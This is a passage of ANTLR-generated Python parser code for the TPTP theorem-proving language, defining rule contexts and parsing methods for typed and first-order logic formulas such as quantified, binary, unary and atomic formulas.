self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Tff_xprod_typeContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def tff_unitary_type(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Tff_unitary_typeContext,0)
def Star(self):
return self.getToken(tptp_v7_0_0_0Parser.Star, 0)
def tff_atomic_type(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Tff_atomic_typeContext,0)
def tff_xprod_type(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Tff_xprod_typeContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_tff_xprod_type
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterTff_xprod_type" ):
listener.enterTff_xprod_type(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitTff_xprod_type" ):
listener.exitTff_xprod_type(self)
def tff_xprod_type(self, _p:int=0):
_parentctx = self._ctx
_parentState = self.state
localctx = tptp_v7_0_0_0Parser.Tff_xprod_typeContext(self, self._ctx, _parentState)
_prevctx = localctx
_startState = 170
self.enterRecursionRule(localctx, 170, self.RULE_tff_xprod_type, _p)
try:
self.enterOuterAlt(localctx, 1)
self.state = 1034
self.tff_unitary_type()
self.state = 1035
self.match(tptp_v7_0_0_0Parser.Star)
self.state = 1036
self.tff_atomic_type()
self._ctx.stop = self._input.LT(-1)
self.state = 1043
self._errHandler.sync(self)
_alt = self._interp.adaptivePredict(self._input,62,self._ctx)
while _alt!=2 and _alt!=ATN.INVALID_ALT_NUMBER:
if _alt==1:
if self._parseListeners is not None:
self.triggerExitRuleEvent()
_prevctx = localctx
localctx = tptp_v7_0_0_0Parser.Tff_xprod_typeContext(self, _parentctx, _parentState)
self.pushNewRecursionContext(localctx, _startState, self.RULE_tff_xprod_type)
self.state = 1038
if not self.precpred(self._ctx, 1):
from antlr4.error.Errors import FailedPredicateException
raise FailedPredicateException(self, "self.precpred(self._ctx, 1)")
self.state = 1039
self.match(tptp_v7_0_0_0Parser.Star)
self.state = 1040
self.tff_atomic_type()
self.state = 1045
self._errHandler.sync(self)
_alt = self._interp.adaptivePredict(self._input,62,self._ctx)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.unrollRecursionContexts(_parentctx)
return localctx
class Tcf_formulaContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def tcf_logic_formula(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Tcf_logic_formulaContext,0)
def tff_typed_atom(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Tff_typed_atomContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_tcf_formula
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterTcf_formula" ):
listener.enterTcf_formula(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitTcf_formula" ):
listener.exitTcf_formula(self)
def tcf_formula(self):
localctx = tptp_v7_0_0_0Parser.Tcf_formulaContext(self, self._ctx, self.state)
self.enterRule(localctx, 172, self.RULE_tcf_formula)
try:
self.state = 1048
self._errHandler.sync(self)
la_ = self._interp.adaptivePredict(self._input,63,self._ctx)
if la_ == 1:
self.enterOuterAlt(localctx, 1)
self.state = 1046
self.tcf_logic_formula()
pass
elif la_ == 2:
self.enterOuterAlt(localctx, 2)
self.state = 1047
self.tff_typed_atom()
pass
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Tcf_logic_formulaContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def tcf_quantified_formula(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Tcf_quantified_formulaContext,0)
def cnf_formula(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Cnf_formulaContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_tcf_logic_formula
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterTcf_logic_formula" ):
listener.enterTcf_logic_formula(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitTcf_logic_formula" ):
listener.exitTcf_logic_formula(self)
def tcf_logic_formula(self):
localctx = tptp_v7_0_0_0Parser.Tcf_logic_formulaContext(self, self._ctx, self.state)
self.enterRule(localctx, 174, self.RULE_tcf_logic_formula)
try:
self.state = 1052
self._errHandler.sync(self)
token = self._input.LA(1)
if token in [tptp_v7_0_0_0Parser.Forall]:
self.enterOuterAlt(localctx, 1)
self.state = 1050
self.tcf_quantified_formula()
pass
elif token in [tptp_v7_0_0_0Parser.T__9, tptp_v7_0_0_0Parser.T__17, tptp_v7_0_0_0Parser.T__18, tptp_v7_0_0_0Parser.T__23, tptp_v7_0_0_0Parser.T__24, tptp_v7_0_0_0Parser.T__25, tptp_v7_0_0_0Parser.Not, tptp_v7_0_0_0Parser.Real, tptp_v7_0_0_0Parser.Rational, tptp_v7_0_0_0Parser.Integer, tptp_v7_0_0_0Parser.Dollar_word, tptp_v7_0_0_0Parser.Dollar_dollar_word, tptp_v7_0_0_0Parser.Upper_word, tptp_v7_0_0_0Parser.Lower_word, tptp_v7_0_0_0Parser.Single_quoted, tptp_v7_0_0_0Parser.Distinct_object]:
self.enterOuterAlt(localctx, 2)
self.state = 1051
self.cnf_formula()
pass
else:
raise NoViableAltException(self)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Tcf_quantified_formulaContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def Forall(self):
return self.getToken(tptp_v7_0_0_0Parser.Forall, 0)
def tff_variable_list(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Tff_variable_listContext,0)
def cnf_formula(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Cnf_formulaContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_tcf_quantified_formula
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterTcf_quantified_formula" ):
listener.enterTcf_quantified_formula(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitTcf_quantified_formula" ):
listener.exitTcf_quantified_formula(self)
def tcf_quantified_formula(self):
localctx = tptp_v7_0_0_0Parser.Tcf_quantified_formulaContext(self, self._ctx, self.state)
self.enterRule(localctx, 176, self.RULE_tcf_quantified_formula)
try:
self.enterOuterAlt(localctx, 1)
self.state = 1054
self.match(tptp_v7_0_0_0Parser.Forall)
self.state = 1055
self.match(tptp_v7_0_0_0Parser.T__11)
self.state = 1056
self.tff_variable_list()
self.state = 1057
self.match(tptp_v7_0_0_0Parser.T__12)
self.state = 1058
self.match(tptp_v7_0_0_0Parser.T__13)
self.state = 1059
self.cnf_formula()
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Fof_formulaContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def fof_logic_formula(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Fof_logic_formulaContext,0)
def fof_sequent(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Fof_sequentContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_fof_formula
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterFof_formula" ):
listener.enterFof_formula(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitFof_formula" ):
listener.exitFof_formula(self)
def fof_formula(self):
localctx = tptp_v7_0_0_0Parser.Fof_formulaContext(self, self._ctx, self.state)
self.enterRule(localctx, 178, self.RULE_fof_formula)
try:
self.state = 1063
self._errHandler.sync(self)
la_ = self._interp.adaptivePredict(self._input,65,self._ctx)
if la_ == 1:
self.enterOuterAlt(localctx, 1)
self.state = 1061
self.fof_logic_formula()
pass
elif la_ == 2:
self.enterOuterAlt(localctx, 2)
self.state = 1062
self.fof_sequent()
pass
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Fof_logic_formulaContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def fof_binary_formula(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Fof_binary_formulaContext,0)
def fof_unitary_formula(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Fof_unitary_formulaContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_fof_logic_formula
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterFof_logic_formula" ):
listener.enterFof_logic_formula(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitFof_logic_formula" ):
listener.exitFof_logic_formula(self)
def fof_logic_formula(self):
localctx = tptp_v7_0_0_0Parser.Fof_logic_formulaContext(self, self._ctx, self.state)
self.enterRule(localctx, 180, self.RULE_fof_logic_formula)
try:
self.state = 1067
self._errHandler.sync(self)
la_ = self._interp.adaptivePredict(self._input,66,self._ctx)
if la_ == 1:
self.enterOuterAlt(localctx, 1)
self.state = 1065
self.fof_binary_formula()
pass
elif la_ == 2:
self.enterOuterAlt(localctx, 2)
self.state = 1066
self.fof_unitary_formula()
pass
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Fof_binary_formulaContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def fof_binary_nonassoc(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Fof_binary_nonassocContext,0)
def fof_binary_assoc(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Fof_binary_assocContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_fof_binary_formula
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterFof_binary_formula" ):
listener.enterFof_binary_formula(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitFof_binary_formula" ):
listener.exitFof_binary_formula(self)
def fof_binary_formula(self):
localctx = tptp_v7_0_0_0Parser.Fof_binary_formulaContext(self, self._ctx, self.state)
self.enterRule(localctx, 182, self.RULE_fof_binary_formula)
try:
self.state = 1071
self._errHandler.sync(self)
la_ = self._interp.adaptivePredict(self._input,67,self._ctx)
if la_ == 1:
self.enterOuterAlt(localctx, 1)
self.state = 1069
self.fof_binary_nonassoc()
pass
elif la_ == 2:
self.enterOuterAlt(localctx, 2)
self.state = 1070
self.fof_binary_assoc()
pass
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Fof_binary_nonassocContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def fof_unitary_formula(self, i:int=None):
if i is None:
return self.getTypedRuleContexts(tptp_v7_0_0_0Parser.Fof_unitary_formulaContext)
else:
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Fof_unitary_formulaContext,i)
def binary_connective(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Binary_connectiveContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_fof_binary_nonassoc
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterFof_binary_nonassoc" ):
listener.enterFof_binary_nonassoc(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitFof_binary_nonassoc" ):
listener.exitFof_binary_nonassoc(self)
def fof_binary_nonassoc(self):
localctx = tptp_v7_0_0_0Parser.Fof_binary_nonassocContext(self, self._ctx, self.state)
self.enterRule(localctx, 184, self.RULE_fof_binary_nonassoc)
try:
self.enterOuterAlt(localctx, 1)
self.state = 1073
self.fof_unitary_formula()
self.state = 1074
self.binary_connective()
self.state = 1075
self.fof_unitary_formula()
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Fof_binary_assocContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def fof_or_formula(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Fof_or_formulaContext,0)
def fof_and_formula(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Fof_and_formulaContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_fof_binary_assoc
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterFof_binary_assoc" ):
listener.enterFof_binary_assoc(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitFof_binary_assoc" ):
listener.exitFof_binary_assoc(self)
def fof_binary_assoc(self):
localctx = tptp_v7_0_0_0Parser.Fof_binary_assocContext(self, self._ctx, self.state)
self.enterRule(localctx, 186, self.RULE_fof_binary_assoc)
try:
self.state = 1079
self._errHandler.sync(self)
la_ = self._interp.adaptivePredict(self._input,68,self._ctx)
if la_ == 1:
self.enterOuterAlt(localctx, 1)
self.state = 1077
self.fof_or_formula(0)
pass
elif la_ == 2:
self.enterOuterAlt(localctx, 2)
self.state = 1078
self.fof_and_formula(0)
pass
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Fof_or_formulaContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def fof_unitary_formula(self, i:int=None):
if i is None:
return self.getTypedRuleContexts(tptp_v7_0_0_0Parser.Fof_unitary_formulaContext)
else:
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Fof_unitary_formulaContext,i)
def Or(self):
return self.getToken(tptp_v7_0_0_0Parser.Or, 0)
def fof_or_formula(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Fof_or_formulaContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_fof_or_formula
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterFof_or_formula" ):
listener.enterFof_or_formula(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitFof_or_formula" ):
listener.exitFof_or_formula(self)
def fof_or_formula(self, _p:int=0):
_parentctx = self._ctx
_parentState = self.state
localctx = tptp_v7_0_0_0Parser.Fof_or_formulaContext(self, self._ctx, _parentState)
_prevctx = localctx
_startState = 188
self.enterRecursionRule(localctx, 188, self.RULE_fof_or_formula, _p)
try:
self.enterOuterAlt(localctx, 1)
self.state = 1082
self.fof_unitary_formula()
self.state = 1083
self.match(tptp_v7_0_0_0Parser.Or)
self.state = 1084
self.fof_unitary_formula()
self._ctx.stop = self._input.LT(-1)
self.state = 1091
self._errHandler.sync(self)
_alt = self._interp.adaptivePredict(self._input,69,self._ctx)
while _alt!=2 and _alt!=ATN.INVALID_ALT_NUMBER:
if _alt==1:
if self._parseListeners is not None:
self.triggerExitRuleEvent()
_prevctx = localctx
localctx = tptp_v7_0_0_0Parser.Fof_or_formulaContext(self, _parentctx, _parentState)
self.pushNewRecursionContext(localctx, _startState, self.RULE_fof_or_formula)
self.state = 1086
if not self.precpred(self._ctx, 1):
from antlr4.error.Errors import FailedPredicateException
raise FailedPredicateException(self, "self.precpred(self._ctx, 1)")
self.state = 1087
self.match(tptp_v7_0_0_0Parser.Or)
self.state = 1088
self.fof_unitary_formula()
self.state = 1093
self._errHandler.sync(self)
_alt = self._interp.adaptivePredict(self._input,69,self._ctx)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.unrollRecursionContexts(_parentctx)
return localctx
class Fof_and_formulaContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def fof_unitary_formula(self, i:int=None):
if i is None:
return self.getTypedRuleContexts(tptp_v7_0_0_0Parser.Fof_unitary_formulaContext)
else:
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Fof_unitary_formulaContext,i)
def And(self):
return self.getToken(tptp_v7_0_0_0Parser.And, 0)
def fof_and_formula(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Fof_and_formulaContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_fof_and_formula
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterFof_and_formula" ):
listener.enterFof_and_formula(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitFof_and_formula" ):
listener.exitFof_and_formula(self)
def fof_and_formula(self, _p:int=0):
_parentctx = self._ctx
_parentState = self.state
localctx = tptp_v7_0_0_0Parser.Fof_and_formulaContext(self, self._ctx, _parentState)
_prevctx = localctx
_startState = 190
self.enterRecursionRule(localctx, 190, self.RULE_fof_and_formula, _p)
try:
self.enterOuterAlt(localctx, 1)
self.state = 1095
self.fof_unitary_formula()
self.state = 1096
self.match(tptp_v7_0_0_0Parser.And)
self.state = 1097
self.fof_unitary_formula()
self._ctx.stop = self._input.LT(-1)
self.state = 1104
self._errHandler.sync(self)
_alt = self._interp.adaptivePredict(self._input,70,self._ctx)
while _alt!=2 and _alt!=ATN.INVALID_ALT_NUMBER:
if _alt==1:
if self._parseListeners is not None:
self.triggerExitRuleEvent()
_prevctx = localctx
localctx = tptp_v7_0_0_0Parser.Fof_and_formulaContext(self, _parentctx, _parentState)
self.pushNewRecursionContext(localctx, _startState, self.RULE_fof_and_formula)
self.state = 1099
if not self.precpred(self._ctx, 1):
from antlr4.error.Errors import FailedPredicateException
raise FailedPredicateException(self, "self.precpred(self._ctx, 1)")
self.state = 1100
self.match(tptp_v7_0_0_0Parser.And)
self.state = 1101
self.fof_unitary_formula()
self.state = 1106
self._errHandler.sync(self)
_alt = self._interp.adaptivePredict(self._input,70,self._ctx)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.unrollRecursionContexts(_parentctx)
return localctx
class Fof_unitary_formulaContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def fof_quantified_formula(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Fof_quantified_formulaContext,0)
def fof_unary_formula(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Fof_unary_formulaContext,0)
def fof_atomic_formula(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Fof_atomic_formulaContext,0)
def fof_logic_formula(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Fof_logic_formulaContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_fof_unitary_formula
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterFof_unitary_formula" ):
listener.enterFof_unitary_formula(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitFof_unitary_formula" ):
listener.exitFof_unitary_formula(self)
def fof_unitary_formula(self):
localctx = tptp_v7_0_0_0Parser.Fof_unitary_formulaContext(self, self._ctx, self.state)
self.enterRule(localctx, 192, self.RULE_fof_unitary_formula)
try:
self.state = 1114
self._errHandler.sync(self)
la_ = self._interp.adaptivePredict(self._input,71,self._ctx)
if la_ == 1:
self.enterOuterAlt(localctx, 1)
self.state = 1107
self.fof_quantified_formula()
pass
elif la_ == 2:
self.enterOuterAlt(localctx, 2)
self.state = 1108
self.fof_unary_formula()
pass
elif la_ == 3:
self.enterOuterAlt(localctx, 3)
self.state = 1109
self.fof_atomic_formula()
pass
elif la_ == 4:
self.enterOuterAlt(localctx, 4)
self.state = 1110
self.match(tptp_v7_0_0_0Parser.T__9)
self.state = 1111
self.fof_logic_formula()
self.state = 1112
self.match(tptp_v7_0_0_0Parser.T__10)
pass
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Fof_quantified_formulaContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def fof_quantifier(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Fof_quantifierContext,0)
def fof_variable_list(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Fof_variable_listContext,0)
def fof_unitary_formula(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Fof_unitary_formulaContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_fof_quantified_formula
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterFof_quantified_formula" ):
listener.enterFof_quantified_formula(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitFof_quantified_formula" ):
listener.exitFof_quantified_formula(self)
def fof_quantified_formula(self):
localctx = tptp_v7_0_0_0Parser.Fof_quantified_formulaContext(self, self._ctx, self.state)
self.enterRule(localctx, 194, self.RULE_fof_quantified_formula)
try:
self.enterOuterAlt(localctx, 1)
self.state = 1116
self.fof_quantifier()
self.state = 1117
self.match(tptp_v7_0_0_0Parser.T__11)
self.state = 1118
self.fof_variable_list()
self.state = 1119
self.match(tptp_v7_0_0_0Parser.T__12)
self.state = 1120
self.match(tptp_v7_0_0_0Parser.T__13)
self.state = 1121
self.fof_unitary_formula()
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Fof_variable_listContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def variable(self, i:int=None):
if i is None:
return self.getTypedRuleContexts(tptp_v7_0_0_0Parser.VariableContext)
else:
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.VariableContext,i)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_fof_variable_list
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterFof_variable_list" ):
listener.enterFof_variable_list(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitFof_variable_list" ):
listener.exitFof_variable_list(self)
def fof_variable_list(self):
localctx = tptp_v7_0_0_0Parser.Fof_variable_listContext(self, self._ctx, self.state)
self.enterRule(localctx, 196, self.RULE_fof_variable_list)
self._la = 0 # Token type
try:
self.enterOuterAlt(localctx, 1)
self.state = 1123
self.variable()
self.state = 1128
self._errHandler.sync(self)
_la = self._input.LA(1)
while _la==tptp_v7_0_0_0Parser.T__1:
self.state = 1124
self.match(tptp_v7_0_0_0Parser.T__1)
self.state = 1125
self.variable()
self.state = 1130
self._errHandler.sync(self)
_la = self._input.LA(1)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Fof_unary_formulaContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def unary_connective(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Unary_connectiveContext,0)
def fof_unitary_formula(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Fof_unitary_formulaContext,0)
def fof_infix_unary(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Fof_infix_unaryContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_fof_unary_formula
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterFof_unary_formula" ):
listener.enterFof_unary_formula(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitFof_unary_formula" ):
listener.exitFof_unary_formula(self)
def fof_unary_formula(self):
localctx = tptp_v7_0_0_0Parser.Fof_unary_formulaContext(self, self._ctx, self.state)
self.enterRule(localctx, 198, self.RULE_fof_unary_formula)
try:
self.state = 1135
self._errHandler.sync(self)
token = self._input.LA(1)
if token in [tptp_v7_0_0_0Parser.Not]:
self.enterOuterAlt(localctx, 1)
self.state = 1131
self.unary_connective()
self.state = 1132
self.fof_unitary_formula()
pass
elif token in [tptp_v7_0_0_0Parser.T__17, tptp_v7_0_0_0Parser.T__18, tptp_v7_0_0_0Parser.T__23, tptp_v7_0_0_0Parser.T__24, tptp_v7_0_0_0Parser.T__25, tptp_v7_0_0_0Parser.Real, tptp_v7_0_0_0Parser.Rational, tptp_v7_0_0_0Parser.Integer, tptp_v7_0_0_0Parser.Dollar_word, tptp_v7_0_0_0Parser.Dollar_dollar_word, tptp_v7_0_0_0Parser.Upper_word, tptp_v7_0_0_0Parser.Lower_word, tptp_v7_0_0_0Parser.Single_quoted, tptp_v7_0_0_0Parser.Distinct_object]:
self.enterOuterAlt(localctx, 2)
self.state = 1134
self.fof_infix_unary()
pass
else:
raise NoViableAltException(self)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Fof_infix_unaryContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def fof_term(self, i:int=None):
if i is None:
return self.getTypedRuleContexts(tptp_v7_0_0_0Parser.Fof_termContext)
else:
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Fof_termContext,i)
def Infix_inequality(self):
return self.getToken(tptp_v7_0_0_0Parser.Infix_inequality, 0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_fof_infix_unary
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterFof_infix_unary" ):
listener.enterFof_infix_unary(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitFof_infix_unary" ):
listener.exitFof_infix_unary(self)
def fof_infix_unary(self):
localctx = tptp_v7_0_0_0Parser.Fof_infix_unaryContext(self, self._ctx, self.state)
self.enterRule(localctx, 200, self.RULE_fof_infix_unary)
try:
self.enterOuterAlt(localctx, 1)
self.state = 1137
self.fof_term()
self.state = 1138
self.match(tptp_v7_0_0_0Parser.Infix_inequality)
self.state = 1139
self.fof_term()
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Fof_atomic_formulaContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def fof_plain_atomic_formula(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Fof_plain_atomic_formulaContext,0)
def fof_defined_atomic_formula(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Fof_defined_atomic_formulaContext,0)
def fof_system_atomic_formula(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Fof_system_atomic_formulaContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_fof_atomic_formula
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterFof_atomic_formula" ):
listener.enterFof_atomic_formula(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitFof_atomic_formula" ):
listener.exitFof_atomic_formula(self)
def fof_atomic_formula(self):
localctx = tptp_v7_0_0_0Parser.Fof_atomic_formulaContext(self, self._ctx, self.state)
self.enterRule(localctx, 202, self.RULE_fof_atomic_formula)
try:
self.state = 1144
self._errHandler.sync(self)
la_ = self._interp.adaptivePredict(self._input,74,self._ctx)
if la_ == 1:
self.enterOuterAlt(localctx, 1)
self.state = 1141
self.fof_plain_atomic_formula()
pass
elif la_ == 2:
self.enterOuterAlt(localctx, 2)
self.state = 1142
self.fof_defined_atomic_formula()
pass
elif la_ == 3:
self.enterOuterAlt(localctx, 3)
self.state = 1143
self.fof_system_atomic_formula()
pass
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Fof_plain_atomic_formulaContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def fof_plain_term(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Fof_plain_termContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_fof_plain_atomic_formula
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterFof_plain_atomic_formula" ):
listener.enterFof_plain_atomic_formula(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitFof_plain_atomic_formula" ):
listener.exitFof_plain_atomic_formula(self)
def fof_plain_atomic_formula(self):
localctx = tptp_v7_0_0_0Parser.Fof_plain_atomic_formulaContext(self, self._ctx, self.state)
self.enterRule(localctx, 204, self.RULE_fof_plain_atomic_formula)
try:
self.enterOuterAlt(localctx, 1)
self.state = 1146
self.fof_plain_term()
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Fof_defined_atomic_formulaContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
